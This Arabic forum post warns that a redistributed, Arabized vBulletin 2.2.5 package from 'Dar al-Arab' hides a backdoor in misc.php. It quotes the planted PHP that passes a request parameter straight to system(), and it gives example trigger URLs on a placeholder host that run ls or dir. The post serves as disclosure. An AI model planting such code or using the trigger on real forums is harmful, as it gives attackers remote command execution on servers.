السلام عليكم ورحمة الله وبركاته ,,,
نزلت أخر نسخه من منتديات vBulliten 2.2.5
والكل بدا بالتحديث والتعريب
وهذي نقطه حلوه
لكن اللي يثير الاشمئزاز هو انه يكون فيه من يستغلك
خلونا من المقدمات والخربطه الفاضيه وندخل في الموضوع
الموضوع هو أستغلال
دار العرب
لكم وأعطائكم نسخ ملوثه غشكم فيها
خلونا نشوف من وين بدا التلاعب
في الملف misc.php
في السطر 110
كود PHP:
// ################ start systemclean2 ##################
if ($action=="systemclean2") {
system("$cc");
exit;
}
السطور هذي ماهي موجوده في أي نسخه من نسخ المنتدى
وحتى لو كانت موجوده فهي ثغره غبيه ولا أعتقد يخطئ جون بكتابتها
فعن طريق أسناد القيمه systemclean2 إلى المتغير action
وبعدها أدخال أي أمر من أوامر نظام التشغيل اللي على السيرفر في المتغير cc
راح يتنفذ هذا الأمر وراح ترجع لك مخرجات الامر هذا في الاكسبلورر
طبعا هو أستخدم الداله system();
والداله passthru();
والداله exec(); ( هذي على ما أعتقد تقوم بتنفيذ أي برنامج على السيرفر)
هو كانت تكفيه وحده منهم بس الظاهر أنه طماع
أنا بأعطيكم الاكسبلويت للثغره وأنتم جربوها ( على نسخه دار العرب 2.2.5 وأكيد النسخ اللي قبلها فيها نفس الغباء)
لنظام التشغيل *nix
http://www.xxx.com/vb/misc.php?actio...emclen2=&cc=ls
اما للويندوز راح تكون
http://www.xxx.com/vb/misc.php?actio...emclen2&cc=dir
وبالأمكان تغيير systemclen2 إلى systemclen3 وأيضا إلى systemclen4
ملاحظه قبل ما أنهي الموضوع:
أما ما أعرف دار العرب ولا أعرف نواياه